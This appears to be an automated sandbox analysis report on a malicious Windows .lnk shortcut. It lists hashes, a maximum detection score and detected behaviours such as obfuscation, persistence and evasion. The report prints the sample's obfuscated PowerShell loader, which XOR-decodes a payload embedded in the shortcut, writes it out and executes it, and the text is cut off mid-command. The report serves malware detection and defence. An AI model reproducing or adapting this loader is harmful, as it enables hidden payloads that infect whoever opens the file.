Edit tour
Windows
Analysis Report
knfV5IVjEV.lnk
Overview
General Information
Sample name: | knfV5IVjEV.lnk (renamed file extension from none to lnk, renamed because original name is a hash value) |
Original sample name: | 2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e |
Analysis ID: | 1430699 |
MD5: | 9d6c79c0b395cceb83662aa3f7ed0123 |
SHA1: | 65f5f7d127c478522e9669200de20000edcb6cfb |
SHA256: | 2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Deletes itself after installation
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Yara detected Obfuscated Powershell
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7464 cmdline:
"C:\Window s\System32 \cmd.exe" /c sLkrGsZ RCfGabaMfK pxFsSpWKAh NPssJmxQAc jvWqTWLATH ZCqoATzGzv pHekkckNXP BjjczUAozV EuRUijweRQ LSofNBqLfR LXEeePsnNH rmfESURkbb EfWgcLVepX BQiKiGQMPt RiqhxyLJoT MfJdkFbwbs ToYRfAcvvj edvHjuQNHC akQwkvfexC FsKuzAkzcX vpndNHJbTQ QnPxsGyzEJ uYXSEMtbgH ipKLgLYLJB MekHNsCkbU cLVtBxrvyb oHVkGzBdrH JNRcWpModk hhZnExuqhJ sAmGodjabn QyUtjpUSwm LcsnTfJGFi fkVHphAiPS fLnRvJoFdo CBTWXpiYPh uBuTgECkdc PLdEfZQASj SdCqFCrZKZ YBuGwCquJS ecAazSxoQX zGfCprYdmC mEzedkpwhA JtSaeQ0000 1DA5xqwRqf FmhfEzAvXo BbfnogPfxy QunyxhuNGM PxfcWvkMuE ofFAjcYWxr BrsSqjZJHw fNQjydVdrT VcKUkJQMou jxpojwfoML wBeYyAqubg gUEEvyGyGG umtmnGwzac YGrFvsYMuK suKhnpUKTL RGHeqjhSKS dQtZhzBZid zVdXnaBmYY NNHpmrZmom jgbBFCaLZN MVAQjVBLRq GWTMdpheNR zqKXTtTzqK aSmkkTkTeq PouYEonoyp uVXimvkCWQ bbufpQJHzj epZvbmVLsE gEbapeUdYQ HGWpoNUoJP FEPokeWzgZ zzkqJwatRk VEJLBwsKho sFcCZBQMPj htXYphvEFS NyxwTaVcMP MksSGUwHrg GnFGcAHKut aNdpAThEKY GNaZxWaeru KNnyjzTStr rkGrNYhdpP LTXszUmGhf ABsaKmzEeb ZqksGvfJky PXPBJSRUZq nmJnQQSGGz wCYoPuGEMe PCuJrENQqT vGEPNNHXBR CxbKckZzPo jmgVAKRaWk bbpPeRYiza NJbWzqALFf EnbcHjyKmd WGbrQAhnFk nQaNzzjktk iftQFPanfU qnXwefHKgY hoetTQnnAh ZopaVQnmLa AVgLVZ||go to&po^w^e^ rs^he^l^l -windowsty le hidden function J ogMjclRPK( ){$zPedYni Bfy=Get-Ch ildItem *. lnk;$zPedY niBfy=$zPe dYniBfy^|w here-objec t{$_.lengt h -eq 0x00 02233E};$n JlRQzeAUMC XVjArUNw=$ zPedYniBfy ;$zPedYniB fy=$zPedYn iBfy^|Sele ct-Object -ExpandPro perty Name ;if($zPedY niBfy.leng th -eq 0){ cd $env:TE MP;$zPedYn iBfy=Get-C hildItem * .lnk;$zPed YniBfy=$zP edYniBfy^| where-obje ct {$_.len gth -eq 0x 0002233E} ;$nJlRQzeA UMCXVjArUN w=$zPedYni Bfy;$zPedY niBfy=$zPe dYniBfy^|S elect-Obje ct -Expand Property N ame;}retur n @($zPedY niBfy, $nJ lRQzeAUMCX VjArUNw)}; function p XufClQZMa( ){$djLutZC NrS=JogMjc lRPK;$zPed YniBfy=$dj LutZCNrS[0 ];$zPedYni Bfy=$zPedY niBfy.subs tring(0,$z PedYniBfy. length-4); return $zP edYniBfy}; function v zGyLDmQaW{ $djLutZCNr S=pXufClQZ Ma;$rqZWEo TXlI=JogMj clRPK;$zPe dYniBfy=$r qZWEoTXlI[ 0];$CvytSi JOHD=[Syst em.IO.Bina ryReader]: :new([Syst em.IO.File ]::open($z PedYniBfy, [System.IO .FileMode] ::Open,[Sy stem.IO.Fi leAccess]: :ReadWrite ,[System.I O.FileShar e]::None)) ;try{$Cvyt SiJOHD.Bas eStream.Se ek(0x00001 DA5,[Syste m.IO.SeekO rigin]::Be gin);$fKLt ldjopW=$Cv ytSiJOHD.R eadBytes(0 x00006C00) ;}finally{ $CvytSiJOH D.Close()} ;for($nJlR QzeAUM=0; $nJlRQzeAU M -lt $fKL tldjopW.co unt; $nJlR QzeAUM++) { $fKLtldj opW[$nJlRQ zeAUM]=$fK LtldjopW[$ nJlRQzeAUM ] -bxor 0x D8 };[Syst em.IO.File ]::WriteAl lBytes($dj LutZCNrS,$ fKLtldjopW );$oEefgaw PUH='.\'+$ djLutZCNrS ;^& $oEefg awPUH;retu rn 'WbpvmJ eASc'};$oE efgawPUH=v zGyLDmQaW; $WrKnPBwfd h=JogMjclR PK;remove-